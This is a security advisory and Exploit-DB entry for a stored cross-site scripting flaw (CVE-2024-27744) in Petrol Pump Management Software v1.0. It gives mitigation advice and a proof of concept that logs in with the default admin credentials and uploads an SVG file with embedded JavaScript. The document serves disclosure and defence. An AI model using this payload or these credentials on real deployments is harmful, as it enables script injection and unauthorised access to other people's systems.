Vendor: Petrol Pump Management Software
By: Shubham Pandey
CVSS: 4.1 (MEDIUM)
Cross Site Scripting (XSS)
CWE: 79
Product Name: Petrol Pump Management Software
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: CVE-2024-27744
CPE: a:petrol_pump_management_software:petrol_pump_management_software:1.0
Platforms Tested: Windows, Linux
2024

Petrol Pump Management Software v.1.0 – Stored Cross Site Scripting via SVG file

An attacker can exploit a Cross Site Scripting vulnerability in Petrol Pump Management Software v.1.0 by injecting malicious code through a crafted payload into the image parameter in the profile.php component. By uploading a specially crafted xss.svg file, the attacker can execute arbitrary code. The content of the xss.svg file includes a script that triggers an alert message.

Mitigation:

To mitigate this vulnerability, sanitize and validate user inputs to prevent the execution of arbitrary code. Additionally, restrict file upload types and sizes, and implement Content Security Policy (CSP) headers to mitigate XSS attacks.

Exploit-DB raw data:

# Exploit Title: Petrol Pump Management Software v.1.0 - Stored Cross Site Scripting via SVG file 
# Date: 01-03-2024
# Exploit Author: Shubham Pandey
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
# Version: 1.0
# Tested on: Windows, Linux
# CVE : CVE-2024-27744
# Description: Cross Site Scripting vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the image parameter in the profile.php component.
# POC:
1. Here we go to: http://localhost/fuelflow/index.php
2. Now login with default username=mayuri.infospace@gmail.com and Password=admin
3. Now go to "http://localhost/fuelflow/admin/profile.php"
4. Upload the xss.svg file in "Image" field
5. Stored XSS will be present in "http://localhost/fuelflow/assets/images/xss.svg" page
6. The content of the xss.svg file is given below:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("XSS by Shubham Pandey");
  </script>
</svg>
# Reference:
https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27744.md